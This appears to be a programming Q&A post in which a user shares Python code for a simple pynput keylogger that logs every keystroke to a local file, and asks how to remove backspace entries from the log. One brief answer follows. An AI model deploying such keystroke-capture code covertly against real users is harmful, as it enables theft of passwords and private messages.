# Deleting the last character input passed to a text file based on the appearance of the string "xyz" in the textfile

Tags: python, python-2.7, formatting, keylogger, pynput

So I have been messing around with the pynput package a bit and noticed that I can create a makeshift keylogger with it. I figured that out, but now I struggle with something else regarding the export of the keystrokes to a .txt file. Python 2.7.15

What I basically want to do is to format the keystroke output to recognize when the key = "backspace" is pressed to delete the exported character before backspace was pressed.

```
from pynput.keyboard import Listener

def write_to_file(key):
    letter = str(key)
    # letter = letter.replace("u'","") not important
    # letter = letter.replace("'", "") not important

if letter == "Key.backspace":
    letter = " backspace "
    # delete the previous charater and move on with the logging

with open("log.txt", 'a') as f:
    f.write(letter)


with Listener(on_press = write_to_file) as lis:
    lis.join()
```

while the keylogger is running, it writes every keystroke to said log.txt file

example: www.googlle_backspace__backspace.com

I apparently made the mistake of writing two l's while visiting google, I pressed backspace 2x times so that my input in the search bar was "www.googl"

Now I want to format that in the log.txt file, so that it somehow identifies the string "*backspace*" and deletes the character before the "*backspace*".

current log.txt

```
"www.googlle_backspace__backspace_e.com"
```

expected log.txt

```
"www.google.com"
```

I know it must be something to do with regex or "re", but I can't get my head around it.

I've thought about registering the string "*backspace*" and sending a delete prompt to delete the last character in the log.txt, but I don't know how to do it.

something like:

```
if letter == "_backspace_":
    # delete string "_backspace_" and one character before it.
```

another example:

log.txt

```
"My name is Jeff, I am 22_backspace_3 years old"
```

expected_log.txt

```
"My My name is Jeff, I am 23 years old"
```

Answer (score 0):

You can read the current contents of the file, then if the character is backspace remove the last character otherwise append the new character to the existing string and write to file. Unsure why you are making a keylogger though.